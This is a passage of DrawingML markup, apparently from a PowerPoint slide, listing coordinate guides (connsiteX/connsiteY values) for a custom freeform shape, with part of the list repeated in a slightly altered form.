              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 92183 w 1349253"/>
